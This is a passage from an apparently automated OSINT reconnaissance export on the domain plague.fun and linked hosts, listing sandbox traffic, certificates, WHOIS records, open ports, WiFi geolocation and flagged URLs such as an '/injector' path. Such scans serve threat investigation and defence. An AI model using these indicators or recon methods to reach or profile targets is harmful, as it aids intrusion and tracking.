https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOmCnqEu92Fr1Me5g.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmYUtvAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmYUtvAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmEU9vAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmEU9vAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: 
https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "142.251.211.234:443"\n "142.250.217.99:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informativ 34.149.204.188 2022-12-18 00:22:01 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b1f5531bc02c54-ORD Content-Encoding: gzip 2a06:98c1:3121::1 2022-12-18 00:03:02 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:54:d1:cf:73:f4:06:da:67:36:31:1b:04:19:11:b7:02:21 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:41:57 2022 GMT Not After : Jun 6 17:41:56 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:99:c4:36:4d:b6:7c:39:c2:f1:77:60:a8:ba:f8: 1c:59:3e:dd:96:42:44:67:b8:8b:49:69:58:1a:9d: ae:aa:d4:88:d9:2c:d6:c2:df:95:1d:df:ac:20:80: f6:6c:90:00:e7:ce:f6:99:5d:a6:86:c6:4c:71:e4: 0a:11:87:6e:9d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server 
Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 7C:C0:30:0A:42:D8:F4:C5:D8:B9:9F:B1:0D:6A:DF:8F:DE:76:96:BE X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Mar 8 18:41:57.493 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:70:F2:E0:AE:CF:85:A2:03:22:79:FB:17: 39:F6:2F:87:C6:15:E4:F1:18:13:A9:F1:82:72:E6:C7: 7E:9E:29:13:02:20:30:0A:4F:75:19:2A:CF:D1:C3:F7: A8:E4:23:2C:B2:7A:99:89:19:E6:BF:91:FC:02:88:FB: 7F:9C:BD:82:04:90 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Mar 8 18:41:57.948 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:5D:16:09:69:44:95:6C:EF:37:FF:ED:F6: DF:17:EC:69:D6:52:78:BA:45:66:C6:1B:4F:46:5D:AE: EF:24:43:F2:02:21:00:E1:1A:7D:CA:9B:93:9F:F9:9E: 3D:06:BC:DF:D0:E8:10:6C:83:BE:BC:7C:A3:59:72:65: 68:4A:22:D1:DB:28:92 Signature Algorithm: ecdsa-with-SHA384 30:66:02:31:00:85:09:85:22:e8:48:da:b2:41:e1:15:a0:ea: 71:65:bc:ea:15:0e:7c:ce:1f:90:f6:cf:0f:d0:23:48:68:37: 61:1a:b2:5a:5f:20:24:73:65:f2:d2:bf:f9:e7:6a:e6:1c:02: 31:00:b8:1a:26:15:77:4d:4a:dc:4f:46:e6:7c:94:6c:91:e2: 82:f4:4e:dd:4f:5d:d6:db:53:3e:d1:f2:6f:3d:cd:1c:82:3f: ed:11:fd:de:35:58:00:77:1d:b7:c3:45:b1:9e plague.fun 2022-12-18 00:16:35 Raw Data from RIRs No numverify 0 0 3 0 None {u'international_format': u'+3544212434', u'local_format': 
u'4212434', u'number': u'3544212434', u'valid': True, u'line_type': u'landline', u'location': u'', u'country_code': u'IS', u'carrier': u'', u'country_name': u'Iceland', u'country_prefix': u'+354'} +3544212434 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 3 0 2 0 None +492283296859 Domain Name: PLAGUE.FUN Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-12-05T18:48:20.0Z Creation Date: 2022-01-08T12:59:17.0Z Registry Expiry Date: 2023-01-08T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: serverHold https://icann.org/epp#serverHold Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:49.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.fun Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-12-05T18:48:20.00Z Creation Date: 2022-01-08T12:59:00.00Z Registrar Registration Expiration Date: 2023-01-08T23:59:59.00Z Registrar: ENOM, INC. 
Registrar IANA ID: 48 Domain Status: serverHold https://www.icann.org/epp#serverHold Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Alpes-Maritimes Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/177ad87c-41f0-4b87-926f-459f450a86e9 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTPS://ICANN.ORG/WICF >>> Last update of WHOIS database: 2022-12-18T00:02:49.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. 
We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:13:04 Affiliate Description - Category No DuckDuckGo 0 0 3 0 None Companies formerly listed on the London Stock Exchange lfbn-nic-1-332-104.w90-116.abo.wanadoo.fr 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 0 0 2 0 None +492283296859 Domain Name: ZEROTWO-BEST-WAIFU.ONLINE Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-01-11T15:03:40.0Z Creation Date: 2021-12-25T22:42:25.0Z Registry Expiry Date: 2022-12-25T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: zerotwo-best-waifu.online Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-01-11T15:03:40.00Z Creation Date: 2021-12-25T22:42:00.00Z Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z Registrar: ENOM, INC. 
Registrar IANA ID: 48 Domain Status: ok https://www.icann.org/epp#ok Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Paris Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. 
By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:26:12 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.pl plague.fun 2022-12-18 00:27:16 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [188.114.96.3] 188.114.96.3 2022-12-18 00:02:39 Domain Name No SpiderFoot UI 46 0 0 0 None plague.fun plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:15:16 HTTP Status Code No Web Spider 0 0 2 0 None None https://zerotwo-best-waifu.online/778112985743251/wap/enner/injector 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:2095 172.67.190.129 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:09:F8:70) 37.780462,-122.390564 2022-12-18 00:22:07 Open TCP Port No Censys 0 1 2 0 None 34.149.204.188:5900 34.149.204.188 2022-12-18 00:07:06 HTTP Headers No Web Spider 2 0 2 0 None {"content-length": "68", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Wed, 02 Nov 2022 16:43:18 GMT", "connection": "keep-alive", "etag": "W/\"44-1843939c80b\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:06 GMT", "access-control-allow-origin": "*", "content-type": 
"text/html; charset=UTF-8"} http://misogyny.wtf:2020/copy 2022-12-18 00:09:44 Co-Hosted Site No HackerTarget 0 0 2 0 None ancient-cell-1aa7.2864713421.workers.dev 172.67.147.230 2022-12-18 00:13:44 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None abuse@register.it Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-05-22T07:28:29Z Creation Date: 2003-05-21T18:09:42Z Registry Expiry Date: 2023-05-21T18:09:42Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: ok https://icann.org/epp#ok Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. 
By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-06-23T00:00:00Z Creation Date: 2011-01-25T00:00:00Z Registrar Registration Expiration Date: 2023-05-21T00:00:00Z Registrar: REGISTER S.P.A. 
Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:11:00Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 56544.56554.repl.co 34.149.204.188 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNetCBD2 (Net ID: 00:01:36:59:CB:D0) 37.780462,-122.390564 2022-12-18 00:23:10 Raw Data from RIRs No CRXcavator 1 0 1 0 None [{"platform": "Chrome", "version": "1342", "data": {"webstore": {"website": "", "rating": 0, "privacy_policy": "", "last_updated": 
"2018-09-27", "name": "Plague Inc", "price": "", "offered_by": "", "support_site": "", "version": "", "address": "", "short_description": "Can you infect the world? Plague Inc. is a unique mix of high strategy and terrifyingly realistic simulation.\n\nYour pathogen has\u2026", "permission_warnings": ["Your data on clients2.google.com", "Data you copy and paste"], "users": 253, "size": "50.13MiB", "type": "Application", "email": "anonymous69anonymous666@gmail.com", "rating_users": 0, "icon": "https://lh3.googleusercontent.com/0_Mq-WxO413qMWau9uPHeHGIf8oFRv6Pr-BYRbRI6hUWCZAeR2EyFBZsrsNatcARd1rEtJMgKqM=w128-h128-e365"}, "risk": {"metadata": {}, "total": 91, "webstore": {"website": 1, "privacy_policy": 1, "last_updated": 5, "users": 1, "address": 1, "total": 11, "support_site": 1, "rating_users": 1}, "permissions": {"total": 80}}, "related": {"piamnadekmbodeiimejmegflchadggmh": {"rating": 3.2055554, "users": 10000, "platform": "", "short_description": "Choose a Virus, Bacteria or Parasite then upgrade and spread your disease across the world in an attempt to overtake the human race!", "icon": "https://lh3.googleusercontent.com/qKxm4GKoTwtCrlGzq-R99mOkHlkun0o6mILRzTNXLUe_ZKbK9uPfzT9jlcf4ybCuGYm8AQCHeISCWuUagDorKjk4Eg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 180, "name": "Pandemic 2"}, "jgaeopgjojikeoiidmfaejkifhgjoooe": {"rating": 4.1774006, "users": 200000, "platform": "", "short_description": "Command & Conquer Tiberium Alliances introduces an all new way to play with your friends in a browser-based, free to play strategy\u2026", "icon": "https://lh3.googleusercontent.com/SHJ9waduwbmAP1N8APS22MO-6jknRoVdKhhk3pOGGyQvfTYTghPOowts7-UmXIcXaIHwo6AAoPs9kOIByoq0W5enVx0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4301, "name": "Command & Conquer Tiberium Alliances"}, "fmfibdjbnmndigbklnlllakjbjheiopj": {"rating": 4.670669, "users": 80000, "platform": "", "short_description": "Defend your Kingdom against the forces of evil in this awesome sequel of the epic tower 
defense game!", "icon": "https://lh3.googleusercontent.com/wu5zLD3jvbWc9uM_VYT1oN5jJzNQ8_3yZ_rc_ovT-Mkl4FCmic6btZ8Oi1xSowhbkeoUQ6S2V2YAN85spLeO-eSw8Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1749, "name": "Kingdom Rush Frontiers"}, "bofmomibemibekfhdnbndompcedgimfl": {"rating": 3.931174, "users": 10000, "platform": "", "short_description": "Might and Magic Heroes Online - Easy to pick up, beautiful & for free. Play it your way by yourself or with friends!", "icon": "https://lh3.googleusercontent.com/8bHGiLjl0PwDAltU95Z1CZiqLsdp5GZOxR0bthAz-wGBXy5f36WuFx3W0UrA2C6DK3ygcBbn019I76bZ5qfhWcUMx_g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 247, "name": "Might and Magic Heroes Online"}, "gohldomknihdgjdinaabghnpnkjhkgcm": {"rating": 3.7919075, "users": 10000, "platform": "", "short_description": "Lunaria Story is a 2D, side-scrolling, massively multiplayer online role-playing game (MMORPG).", "icon": "https://lh3.googleusercontent.com/rYfXlSeN63sJW6ll6pKFK-MqErn5KGPgUz7qxlikWS3SUyAGcEJBDS38OKLMBTqbQxDZrqz-1Yp0aysTJBUnIaUu=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 173, "name": "Lunaria Story"}, "khgabmflimjjbclkmljlpmgaleanedem": {"rating": 4.4696846, "users": 200000, "platform": "", "short_description": "The only chess game that puts fun first. Play against the computer or challenge your friends online!", "icon": "https://lh3.googleusercontent.com/7rE6PLLaxuDaQYoBzsNvdrRCGyHGAEWXNGyNcAAOVkDNnbvJMw6WGHIknQy4xF_w33MrPkNquEC-Q7CKzBOh4_3Log=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 6119, "name": "SparkChess"}, "ppmiljlihhlfoekfknliaimndefafdml": {"rating": 3.8549619, "users": 10000, "platform": "", "short_description": "Fight with elves and dwarves against orcs and the forces of evil! 
Defend your city and become the most powerful lord of all!", "icon": "https://lh3.googleusercontent.com/XEp8ZomRS2zcjXMgyxguYq63-oZdJyXjLndPVteO79qXVwuVeYX5cgZTKFz1lE2rZ-rba7r1_hVNrROK7hqYRzIA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 131, "name": "Shadow Kings"}, "clkfdgnfefjmciocbhnffnbpkjpdleca": {"rating": 3.8338633, "users": 70000, "platform": "", "short_description": "Throw on your overalls and hit the fields!
Take home the blue ribbon as farmer of the year!", "icon": "https://lh3.googleusercontent.com/-biu79UGgMFr7LA32bnfg26g8pssU8e_Uvta1ysUUa1ainkKHGQdlBDTHKpKGGtc5rC254AVzmDmtNvqBr_VomUHHg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1258, "name": "FARMERAMA"}, "kkiklippbohodiogcpjgbjagfbajpobc": {"rating": 3.8280256, "users": 10000, "platform": "", "short_description": "Do you have what it takes to become a Legend? Gather your forces and prepare your heroes for battle in Legends of Honor!", "icon": "https://lh3.googleusercontent.com/4xUCZSCGvpG6yrO75panShmTUmoqOIVgWkPNMVzaQQUZf1tJnjKAqIsD6VPrtXPW7Yx1DIMvTHSnCicc0MOuFgUB=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 157, "name": "Legends of Honor"}, "beoejcompfcffbdhaknieiimbkakdbof": {"rating": 3.813187, "users": 23071, "platform": "", "short_description": "Help fire boy and water girl in their adventure.", "icon": "https://lh3.googleusercontent.com/Mi8D4FGay9rMrsOzg2ZsG5O8PN8vFSYRieCdbBjg6pT1JtCbd8Vf5tBlVeVG2rCfUReMLntT7AY=w128-h128-e365", "rating_users": 91, "name": "Fireboy And Watergirl"}, "hgmpilchchdmdnibhgnjjbghglgffgjp": {"rating": 3.74, "users": 9000, "platform": "", "short_description": "The 2nd World War: Tank clashes, Naval battles, Air combat. 
